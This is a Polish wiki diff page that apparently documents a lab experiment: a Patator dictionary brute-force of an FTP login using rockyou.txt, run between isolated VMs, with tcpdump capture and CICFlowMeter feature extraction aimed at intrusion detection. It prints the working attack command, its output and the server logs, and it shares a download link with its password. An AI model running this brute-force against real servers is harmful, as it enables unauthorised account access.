Różnice

Różnice między wybraną wersją a wersją aktualną.

--- notatki:ftp_bruteforce [2025/06/19 17:06] – administrator
+++ notatki:ftp_bruteforce [2025/06/19 20:09] (aktualna) – administrator
@@ Linia 1: / Linia 1: @@
-====== FTP Bruteforce (Patator i CICFlowMeter) ======
+====== Security: FTP Bruteforce (Patator i CICFlowMeter) ======
 ===== Schemat i opis środowiska testowego =====
@@ Linia 15: / Linia 15: @@
 Każda z Maszyn ma dysk o rozmiarze 8GB ([[https://documentation.ubuntu.com/server/reference/installation/system-requirements/|Wymagania minimalne ubuntu]] mówią o minimalnie 5GB). Dyski są w formacie vhdx, wykorzystywanym przez hyper-v.
-Dyski maszyn można pobrać z linków poniżej:\\
+Dyski maszyn można pobrać z linka poniżej:\\
+https://1drv.ms/f/c/9dd28f74d9c48b45/ElEe6P0-WYpOmB3YukiRtzwBVGtNNW8QbW3jmy5V-9PWPQ?e=RSLSO4\\
+Hasło do linka: ''Ostrowski19062025''
 ===== Oprogramowanie wykorzystane do wykonania eksperymentu =====
@@ Linia 23: / Linia 24: @@
 | System operacyjny maszyn wirtualnych  | 24.04.2 LTS                | Ubuntu Server  |
 | Hypervisor                            | Wersja: 10.0.26100.1882    | Hyper-V        |
-| Serwer FTP                            | 3.0.3                      | VSFTPD         |
+| Serwer FTP                            | 3.0.5                      | VSFTPD         |
-| Narzędzie ataku                       | 0.7                        | Patator        |
+| Narzędzie ataku                       | 1.0                        | Patator        |
 | Przechwytywanie ruchu                 | 4.99.1                     | tcpdump        |
-| Analiza Ruchu                         | 0.4.2                        | CICFlowMeter   |
+| Analiza Ruchu                         | 0.4.2                      | CICFlowMeter   |
 | Słownik do ataku                      | ok. 14 MB, 14344392 haseł  | rockyou.txt    |
@@ Linia 45: / Linia 46: @@
 packages can be upgraded. Run 'apt list --upgradable' to see them.
 administrator@target:~$ sudo apt install vsftpd -y
-Reading package lists... Done
+[LOGI Z INSTALACJI]
-Building dependency tree... Done
-Reading state information... Done
-The following additional packages will be installed:
-  ssl-cert
-The following NEW packages will be installed:
-  ssl-cert vsftpd
-upgraded, 2 newly installed, 0 to remove and 58 not upgraded.
-Need to get 137 kB of archives.
-After this operation, 380 kB of additional disk space will be used.
-Get:1 http://archive.ubuntu.com/ubuntu noble/main amd64 ssl-cert all 1.1.2ubuntu1 [17.8 kB]
-Get:2 http://archive.ubuntu.com/ubuntu noble-updates/main amd64 vsftpd amd64 3.0.5-0ubuntu3.1 [120 kB]
-Fetched 137 kB in 0s (424 kB/s)
-Preconfiguring packages ...
-Selecting previously unselected package ssl-cert.
-(Reading database ... 86807 files and directories currently installed.)
-Preparing to unpack .../ssl-cert_1.1.2ubuntu1_all.deb ...
-Unpacking ssl-cert (1.1.2ubuntu1) ...
-Selecting previously unselected package vsftpd.
-Preparing to unpack .../vsftpd_3.0.5-0ubuntu3.1_amd64.deb ...
-Unpacking vsftpd (3.0.5-0ubuntu3.1) ...
-Setting up ssl-cert (1.1.2ubuntu1) ...
-Created symlink /etc/systemd/system/multi-user.target.wants/ssl-cert.service → /usr/lib/systemd/system/ssl-cert.service.
-Setting up vsftpd (3.0.5-0ubuntu3.1) ...
-Created symlink /etc/systemd/system/multi-user.target.wants/vsftpd.service → /usr/lib/systemd/system/vsftpd.service.
-Processing triggers for man-db (2.12.0-4build2) ...
-Scanning processes...
-Scanning linux images...
-Running kernel seems to be up-to-date.
-No services need to be restarted.
-No containers need to be restarted.
-No user sessions are running outdated binaries.
-No VM guests are running outdated hypervisor (qemu) binaries on this host.
-administrator@target:~$
 </code>
-Plik konfiguracyjny ''/etc/vsftpd.conf'':\\
+Zmiany w pliku konfiguracyjnym ''/etc/vsftpd.conf'':\\
 <code bash>
-administrator@target:~$ sudo nano /etc/vsftpd.conf
-administrator@target:~$ cat /etc/vsftpd.conf
-# Example config file /etc/vsftpd.conf
-#
-# The default compiled in settings are fairly paranoid. This sample file
-# loosens things up a bit, to make the ftp daemon more usable.
-# Please see vsftpd.conf.5 for all compiled in defaults.
-#
-# READ THIS: This example file is NOT an exhaustive list of vsftpd options.
-# Please read the vsftpd.conf.5 manual page to get a full idea of vsftpd's
-# capabilities.
-#
-#
-# Run standalone?  vsftpd can run either from an inetd or as a standalone
-# daemon started from an initscript.
-listen=YES
-#
-# This directive enables listening on IPv6 sockets. By default, listening
-# on the IPv6 "any" address (::) will accept connections from both IPv6
-# and IPv4 clients. It is not necessary to listen on *both* IPv4 and IPv6
-# sockets. If you want that (perhaps because you want to listen on specific
-# addresses) then you must run two copies of vsftpd with two configuration
-# files.
-listen_ipv6=NO
-#
-# Allow anonymous FTP? (Disabled by default).
 anonymous_enable=NO
-#
-# Uncomment this to allow local users to log in.
 local_enable=YES
-#
-# Uncomment this to enable any form of FTP write command.
 write_enable=YES
-#
+listen=YES
-# Default umask for local users is 077. You may wish to change this to 022,
+listen_ipv6=NO
-# if your users expect that (022 is used by most other ftpd's)
-#local_umask=022
-#
-# Uncomment this to allow the anonymous FTP user to upload files. This only
-# has an effect if the above global write enable is activated. Also, you will
-# obviously need to create a directory writable by the FTP user.
-#anon_upload_enable=YES
-#
-# Uncomment this if you want the anonymous FTP user to be able to create
-# new directories.
-#anon_mkdir_write_enable=YES
-#
-# Activate directory messages - messages given to remote users when they
-# go into a certain directory.
-dirmessage_enable=YES
-#
-# If enabled, vsftpd will display directory listings with the time
-# in  your  local  time  zone.  The default is to display GMT. The
-# times returned by the MDTM FTP command are also affected by this
-# option.
-use_localtime=YES
-#
-# Activate logging of uploads/downloads.
-xferlog_enable=YES
-#
-# Make sure PORT transfer connections originate from port 20 (ftp-data).
-connect_from_port_20=YES
-#
-# If you want, you can arrange for uploaded anonymous files to be owned by
-# a different user. Note! Using "root" for uploaded files is not
-# recommended!
-#chown_uploads=YES
-#chown_username=whoever
-#
-# You may override where the log file goes if you like. The default is shown
-# below.
-#xferlog_file=/var/log/vsftpd.log
-#
-# If you want, you can have your log file in standard ftpd xferlog format.
-# Note that the default log file location is /var/log/xferlog in this case.
-#xferlog_std_format=YES
-#
-# You may change the default value for timing out an idle session.
-#idle_session_timeout=600
-#
-# You may change the default value for timing out a data connection.
-#data_connection_timeout=120
-#
-# It is recommended that you define on your system a unique user which the
-# ftp server can use as a totally isolated and unprivileged user.
-#nopriv_user=ftpsecure
-#
-# Enable this and the server will recognise asynchronous ABOR requests. Not
-# recommended for security (the code is non-trivial). Not enabling it,
-# however, may confuse older FTP clients.
-#async_abor_enable=YES
-#
-# By default the server will pretend to allow ASCII mode but in fact ignore
-# the request. Turn on the below options to have the server actually do ASCII
-# mangling on files when in ASCII mode.
-# Beware that on some FTP servers, ASCII support allows a denial of service
-# attack (DoS) via the command "SIZE /big/file" in ASCII mode. vsftpd
-# predicted this attack and has always been safe, reporting the size of the
-# raw file.
-# ASCII mangling is a horrible feature of the protocol.
-#ascii_upload_enable=YES
-#ascii_download_enable=YES
-#
-# You may fully customise the login banner string:
-#ftpd_banner=Welcome to blah FTP service.
-#
-# You may specify a file of disallowed anonymous e-mail addresses. Apparently
-# useful for combatting certain DoS attacks.
-#deny_email_enable=YES
-# (default follows)
-#banned_email_file=/etc/vsftpd.banned_emails
-#
-# You may restrict local users to their home directories.  See the FAQ for
-# the possible risks in this before using chroot_local_user or
-# chroot_list_enable below.
-#chroot_local_user=YES
-#
-# You may specify an explicit list of local users to chroot() to their home
-# directory. If chroot_local_user is YES, then this list becomes a list of
-# users to NOT chroot().
-# (Warning! chroot'ing can be very dangerous. If using chroot, make sure that
-# the user does not have write access to the top level directory within the
-# chroot)
-#chroot_local_user=YES
-#chroot_list_enable=YES
-# (default follows)
-#chroot_list_file=/etc/vsftpd.chroot_list
-#
-# You may activate the "-R" option to the builtin ls. This is disabled by
-# default to avoid remote users being able to cause excessive I/O on large
-# sites. However, some broken FTP clients such as "ncftp" and "mirror" assume
-# the presence of the "-R" option, so there is a strong case for enabling it.
-#ls_recurse_enable=YES
-#
-# Customization
-#
-# Some of vsftpd's settings don't fit the filesystem layout by
-# default.
-#
-# This option should be the name of a directory which is empty.  Also, the
-# directory should not be writable by the ftp user. This directory is used
-# as a secure chroot() jail at times vsftpd does not require filesystem
-# access.
-secure_chroot_dir=/var/run/vsftpd/empty
-#
-# This string is the name of the PAM service vsftpd will use.
-pam_service_name=vsftpd
-#
-# This option specifies the location of the RSA certificate to use for SSL
-# encrypted connections.
-rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
-rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
-ssl_enable=NO
-#
-# Uncomment this to indicate that vsftpd use a utf8 filesystem.
-#utf8_filesystem=YES
-administrator@target:~$
 </code>
@@ Linia 297: / Linia 107: @@
 Instalacja Narzędzi:\\
 <code bash>
-sudo apt update
+administrator@attacker:~$ sudo apt update -y
-sudo apt install git python3-pip tcpdump -y
+[sudo] password for administrator:
+Hit:1 http://security.ubuntu.com/ubuntu noble-security InRelease
+Hit:2 http://archive.ubuntu.com/ubuntu noble InRelease
+Hit:3 http://archive.ubuntu.com/ubuntu noble-updates InRelease
+Hit:4 http://archive.ubuntu.com/ubuntu noble-backports InRelease
+Reading package lists... Done
+Building dependency tree... Done
+Reading state information... Done
+packages can be upgraded. Run 'apt list --upgradable' to see them.
+administrator@attacker:~$ sudo apt install git python3-pip tcpdump -y
+[TUTAJ LOGI Z INSTALACJI]
 </code>
+Przed instalacją patatora dodano repozytoria kali-linux do ubuntu.\\
 Instalacja Patatora:\\
 <code bash>
-git clone https://github.com/lanjelot/patator.git
+administrator@attacker:~$ sudo apt install patator -y
-cd patator
+[TUTAJ LOGI Z INSTALACJI]
-pip install -r requirements.txt
 </code>
 Instalacja CICFlowMeter w wersji Python:\\
 <code bash>
-cd ~
+administrator@attacker:~/patator$ pip install cicflowmeter
-git clone https://github.com/ahlashkari/CICFlowMeter.git
+[TUTAJ LOGI Z INSTALACJI]
-cd CICFlowMeter
-pip install -r requirements.txt
 </code>
 Pobranie słownika do ataku:\\
 <code bash>
-sudo apt install seclists unzip -y
+administrator@attacker:~$ wget https://github.com/danielmiessler/SecLists/raw/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz
-cp /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz ~/
+--2025-06-19 15:19:13--  https://github.com/danielmiessler/SecLists/raw/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz
-cd ~
+Resolving github.com (github.com)... 140.82.121.3
-tar -xzf rockyou.txt.tar.gz
+Connecting to github.com (github.com)|140.82.121.3|:443... connected.
+HTTP request sent, awaiting response... 302 Found
+Location: https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz [following]
+--2025-06-19 15:19:14--  https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz
+Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.110.133, ...
+Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
+HTTP request sent, awaiting response... 200 OK
+Length: 53291283 (51M) [application/octet-stream]
+Saving to: ‘rockyou.txt.tar.gz’
+rockyou.txt.tar.gz                                  100%[=================================================================================================================>]  50.82M  1.56MB/s    in 32s
+-06-19 15:19:48 (1.59 MB/s) - ‘rockyou.txt.tar.gz’ saved [53291283/53291283]
+administrator@attacker:~$ tar -xzf rockyou.txt.tar.gz
+administrator@attacker:~$ wc -l rockyou.txt #liczba haseł około 14 milionów
+14344391 rockyou.txt
+administrator@attacker:~$ head rockyou.txt #pierwsze wpisy w pliku
+
+
+123456789
+password
+iloveyou
+princess
+1234567
+rockyou
+12345678
+abc123
 </code>
 ====== Test Komunikacji ======
+Ping:\\
 <code bash>
 administrator@target:~$ ping 10.10.10.2
 PING 10.10.10.2 (10.10.10.2) 56(84) bytes of data.
@@ Linia 342: / Linia 186: @@
 rtt min/avg/max/mdev = 0.180/0.258/0.293/0.037 ms
 administrator@target:~$
+</code>
+FTP:\\
+<code bash>
+administrator@attacker:~$ ftp 10.10.10.1
+Connected to 10.10.10.1.
+(vsFTPd 3.0.5)
+Name (10.10.10.1:administrator): ftpuser
+Please specify the password.
+Password:
+Login successful.
+Remote system type is UNIX.
+Using binary mode to transfer files.
+ftp> dir
+Entering Extended Passive Mode (|||8296|)
+Here comes the directory listing.
+Directory send OK.
+ftp>
 </code>
 ====== Przeprowadzenie Ataku ======
-Uruchomienie przechwytywania:\\
+W jednej sesji terminala uruchomienie przechwytywania:\\
 <code bash>
-sudo tcpdump -i eth0 port 21 -w ftp_attack.pcap
+sudo tcpdump -i eth1 port 21 -w ftp_attack.pcap
 </code>
-Atak Patator:\\
+W drugiej sesji terminala atak Patator:\\
 <code bash>
-./patator ftp_login host=192.168.0.105 user=ftpuser password=FILE0 0=rockyou.txt -x ignore:mesg='Login incorrect' --rate-limit=5
+administrator@attacker:~$ patator ftp_login host=10.10.10.1 user=ftpuser password=FILE0 0=rockyou.txt -x ignore:mesg='Login incorrect' --rate-limit=50
+:39:45 patator    INFO - Starting Patator 1.0 (https://github.com/lanjelot/patator) with python-3.12.3 at 2025-06-19 15:39 UTC
+:39:45 patator    INFO -
+:39:45 patator    INFO - code  size    time | candidate                          |   num | mesg
+:39:45 patator    INFO - -----------------------------------------------------------------------------
+:40:38 patator    INFO - 530   16     2.772 | 123456                             |     1 | Login incorrect.
+:40:38 patator    INFO - 530   16     2.778 | 12345                              |     2 | Login incorrect.
+:40:38 patator    INFO - 530   16     2.785 | 123456789                          |     3 | Login incorrect.
+:40:38 patator    INFO - 530   16     2.770 | password                           |     4 | Login incorrect.
+:40:38 patator    INFO - 530   16     2.770 | iloveyou                           |     5 | Login incorrect.
+:40:38 patator    INFO - 530   16     2.786 | princess                           |     6 | Login incorrect.
+:40:38 patator    INFO - 530   16     2.776 | 1234567                            |     7 | Login incorrect.
+:40:38 patator    INFO - 530   16     2.773 | rockyou                            |     8 | Login incorrect.
+:40:38 patator    INFO - 530   16     2.784 | 12345678                           |     9 | Login incorrect.
+:40:38 patator    INFO - 530   16     2.778 | abc123                             |    10 | Login incorrect.
+[TUTAJ CIĄGNIE SIĘ DALEJ]
 </code>
-  * ''--rate-limit=5'': ogranicza tempo ataku do 5 prób/sekundę (by nie przytłoczyć serwera)
+  * ''--rate-limit=50'': ogranicza tempo ataku do 50 prób/sekundę (by nie przytłoczyć serwera)
   * ''rockyou.txt'': używa ogólnodostępnego słownika
-⚠️ W tym przypadku atak się nie powiedzie, ponieważ utworzone hasło nie znajduje się w rockyou.txt – i o to właśnie chodzi: chodzi o symulację nieudanego ataku, który będzie wyraźnie widoczny w ruchu.
+<WRAP center round important 60%>
+W tym przypadku atak się nie powiedzie, ponieważ utworzone hasło nie znajduje się w rockyou.txt – i o to właśnie chodzi: chodzi o symulację nieudanego ataku, który będzie wyraźnie widoczny w ruchu.
+</WRAP>
 ====== Efekty Ataku ======
@@ Linia 373: / Linia 252: @@
 Fragment logu z /var/log/vsftpd.log:
 <code yaml>
-WKLEIĆ TUTAJ FRAGMENT LOGÓW
+administrator@target:~$ sudo tail -f /var/log/vsftpd.log
+[sudo] password for administrator:
+Thu Jun 19 15:27:39 2025 [pid 6752] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:27:50 2025 [pid 6751] [ftpuser] OK LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7001] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7003] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7005] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7007] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7009] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7011] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7013] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7015] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7017] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:35 2025 [pid 7019] CONNECT: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7000] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7006] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7002] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7008] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7004] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7014] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7012] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7010] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7016] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:40:37 2025 [pid 7018] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7006] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7000] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7008] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7002] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7012] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7014] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7004] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7010] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7016] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:41:30 2025 [pid 7018] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7006] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7008] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7002] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7000] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7012] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7010] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7004] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7014] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7018] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+Thu Jun 19 15:42:23 2025 [pid 7016] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
+[TUTAJ CIĄGNIE SIĘ DALEJ]
 </code>
+Pełna wersja logów do pobrania {{:notatki:vsftpd_copy.log}}
+<WRAP center round info 60%>
+Po 765 próbach (~122min) zatrzymano eksperyment
+</WRAP>
 ====== Użycie CICFlowMeter (Python) i ekstrakcja cech ======
 <code bash>
-cd ~/CICFlowMeter
+administrator@attacker:~$ cicflowmeter -f ftp_attack.pcap -c ftp_attack.csv
-python3 CICFlowMeter.py -f ftp_attack.pcap -o output/
+reading from file ftp_attack.pcap, link-type EN10MB (Ethernet), snapshot length 262144
+administrator@attacker:~$ ls -lah
+total 186M
+drwxr-x--- 7 administrator administrator 4.0K Jun 19 17:16 .
+drwxr-xr-x 3 root          root          4.0K Jun 19 15:07 ..
+-rw------- 1 administrator administrator 1.1K Jun 19 15:25 .bash_history
+-rw-r--r-- 1 administrator administrator  220 Mar 31  2024 .bash_logout
+-rw-r--r-- 1 administrator administrator 3.7K Mar 31  2024 .bashrc
+drwx------ 4 administrator administrator 4.0K Jun 19 17:15 .cache
+drwx------ 2 administrator administrator 4.0K Jun 19 17:15 .config
+-rw-rw-r-- 1 administrator administrator 263K Jun 19 17:16 ftp_attack.csv
+-rw-r--r-- 1 tcpdump       tcpdump       750K Jun 19 17:09 ftp_attack.pcap
+drwxrwxr-x 7 administrator administrator 4.0K Jun 19 15:13 patator
+-rw-r--r-- 1 administrator administrator  807 Mar 31  2024 .profile
+-rw------- 1 administrator administrator 134M Sep 23  2015 rockyou.txt
+-rw-rw-r-- 1 administrator administrator  51M Jun 19 15:19 rockyou.txt.tar.gz
+drwx------ 2 administrator administrator 4.0K Jun 19 15:07 .ssh
+-rw-r--r-- 1 administrator administrator    0 Jun 19 15:08 .sudo_as_admin_successful
+drwxrwxr-x 6 administrator administrator 4.0K Jun 19 15:16 venv_patator
+-rw-rw-r-- 1 administrator administrator  215 Jun 19 15:19 .wget-hsts
+-rw------- 1 administrator administrator  108 Jun 19 15:25 .Xauthority
+administrator@attacker:~$ cat ftp_attack.csv
+src_ip,dst_ip,src_port,dst_port,protocol,timestamp,flow_duration,flow_byts_s,flow_pkts_s,fwd_pkts_s,bwd_pkts_s,tot_fwd_pkts,tot_bwd_pkts,totlen_fwd_pkts,totlen_bwd_pkts,fwd_pkt_len_max,fwd_pkt_len_min,fwd_pkt_len_mean,fwd_pkt_len_std,bwd_pkt_len_max,bwd_pkt_len_min,bwd_pkt_len_mean,bwd_pkt_len_std,pkt_len_max,pkt_len_min,pkt_len_mean,pkt_len_std,pkt_len_var,fwd_header_len,bwd_header_len,fwd_seg_size_min,fwd_act_data_pkts,flow_iat_mean,flow_iat_max,flow_iat_min,flow_iat_std,fwd_iat_tot,fwd_iat_max,fwd_iat_min,fwd_iat_mean,fwd_iat_std,bwd_iat_tot,bwd_iat_max,bwd_iat_min,bwd_iat_mean,bwd_iat_std,fwd_psh_flags,bwd_psh_flags,fwd_urg_flags,bwd_urg_flags,fin_flag_cnt,syn_flag_cnt,rst_flag_cnt,psh_flag_cnt,ack_flag_cnt,urg_flag_cnt,ece_flag_cnt,down_up_ratio,pkt_size_avg,init_fwd_win_byts,init_bwd_win_byts,active_max,active_min,active_mean,active_std,idle_max,idle_min,idle_mean,idle_std,fwd_byts_b_avg,fwd_pkts_b_avg,bwd_byts_b_avg,bwd_pkts_b_avg,fwd_blk_rate_avg,bwd_blk_rate_avg,fwd_seg_size_avg,bwd_seg_size_avg,cwr_flag_count,subflow_fwd_pkts,subflow_bwd_pkts,subflow_fwd_byts,subflow_bwd_byts
+.10.10.1,10.10.10.2,21,37852,6,2025-06-19 15:41:31,103.324816,12.12680601337824,0.1645296905246848,0.09678217089687341,0.06774751962781139,10,7,736,517,100,54,73.6,15.226293048539425,81,66,73.85714285714286,6.854166020511517,100,54,73.70588235294117,12.479464099930464,155.73702422145328,200,140,20,4,6.457801,49.981098,0.0,16.465319560282826,103.324816,50.001816,0.0,11.480535111111113,20.609759023049122,103.284029,49.981098,4e-05,17.21400483333333,23.19276500435293,4,3,0,0,3,0,2,7,15,0,0,0.7,73.70588235294117,510,502,0,0,0,0,0,0,0,0,0,0,0,0,0,0,73.6,73.85714285714286,0,10,7,736,517
+[I TAK DALEJ]
 </code>
-W katalogu ''output/'' został zapisany plik ''ftp_attack_Flow.csv''.
+Wynik przechwytywania do pobrania {{:notatki:ftp_attack.pcap}}
+Wynik ekstrakcji cech do pobrania {{:notatki:ftp_attack.csv}}
+===== Kluczowe cechy wyniku (Analiza pierwszego wiersza CSV) =====
+<code>
+src_ip=10.10.10.1, dst_ip=10.10.10.2, dst_port=37852, protocol=6 (TCP)
+flow_duration=103.3 s
+tot_fwd_pkts=10, tot_bwd_pkts=7
+flow_byts_s ≈ 12.13 B/s, flow_pkts_s ≈ 0.165 pkt/s
+pkt_len_mean ≈ 73.7 B
+flow_iat_mean ≈ 16.47 s
+bwd_blk_rate_avg ≈ 0.7 (ilość pakietów w tył do przodu)
+</code>
+  * ''flow_duration'' (~103 s) – sesja trwała ponad 1,5 minuty; w przypadku automatycznego ataku można się tego spodziewać, gdy serwer zwalnia odpowiedzi.
+  * ''tot_fwd_pkts'' = 10, ''tot_bwd_pkts'' = 7 – 10 prób logowania z serwera (komunikaty żądania), 7 odpowiedzi serwera (błędy logowania).
+  * ''flow_byts_s'' ≈ 12 B/s – to stosunkowo niska przepustowość, typowa dla sesji inicjowanych ręcznie lub przy wolnym ftp.
+  * ''flow_pkts_s'' ≈ 0.165 pkt/s – bardzo rzadkie pakiety (średnio co 6 sekund), co może sugerować rate-limit lub timeout serwera.
+  * ''flow_iat_mean'' ≈ 16 s – średnia odległość czasowa między pakietami to 16 s, co wskazuje na powolną interakcję między próbami.
+===== Uproszczona sygnatura ataku =====
+Poniżej prosty skrypt wizualizujący dane wyjściowe z programu CICFlowMeter:\\
+<code python signature_grapher.py>
+import pandas as pd
+import matplotlib.pyplot as plt
+# Wczytanie danych z pliku CSV
+df = pd.read_csv('ftp_attack.csv')
+# Wybór interesujących cech
+features = ['flow_duration', 'flow_byts_s', 'flow_pkts_s', 'fwd_pkts_s', 'bwd_pkts_s',
+            'tot_fwd_pkts', 'tot_bwd_pkts', 'totlen_fwd_pkts', 'totlen_bwd_pkts',
+            'fwd_pkt_len_max', 'bwd_pkt_len_max', 'flow_iat_mean', 'flow_iat_std',
+            'flow_iat_max', 'flow_iat_min']
+df_selected = df[features]
+# Normalizacja danych (opcjonalnie)
+df_normalized = (df_selected - df_selected.mean()) / df_selected.std()
+# Wizualizacja
+plt.figure(figsize=(12, 8))
+for feature in df_normalized.columns:
+    plt.plot(df_normalized.index, df_normalized[feature], label=feature)
+plt.title('Sygnatura Ataku')
+plt.xlabel('Indeks Przepływu')
+plt.ylabel('Znormalizowana Wartość')
+plt.legend()
+plt.grid(True)
+plt.show()
+</code>
+{{.:pasted:20250619-194744.png}}
+====== Wnioski ======
+  * Skuteczność ataku brute-force zależy od słownika – jeśli hasło użytkownika nie jest w słowniku, atak się nie powiedzie, choć nadal generuje duży ruch i może zostać wykryty.
+  * Monitorowanie logów serwera FTP jest kluczowe – logi wyraźnie pokazują wielokrotne, nieudane próby logowania, co pozwala administratorowi wykryć próbę ataku.
+  * Przechwytywanie i analiza ruchu (tcpdump + CICFlowMeter) – umożliwiają szczegółową analizę zachowania sieci podczas ataku, co może być wykorzystane do budowy systemów wykrywania włamań (IDS).
+  * Ograniczenie szybkości ataku (--rate-limit=50) – jest istotne, aby nie przeciążyć serwera i lepiej symulować realistyczne warunki ataku.
+  * Silne, losowe hasło zabezpiecza konto – stosowanie silnych haseł, które nie występują w popularnych słownikach, jest podstawową ochroną przed atakami brute-force.
+  * Środowisko testowe oparte na VM i Hyper-V – pozwala na bezpieczne i kontrolowane przeprowadzanie eksperymentów bezpieczeństwa.

Kacper's Wiki

Narzędzia użytkownika

Narzędzia witryny

Różnice

Narzędzia strony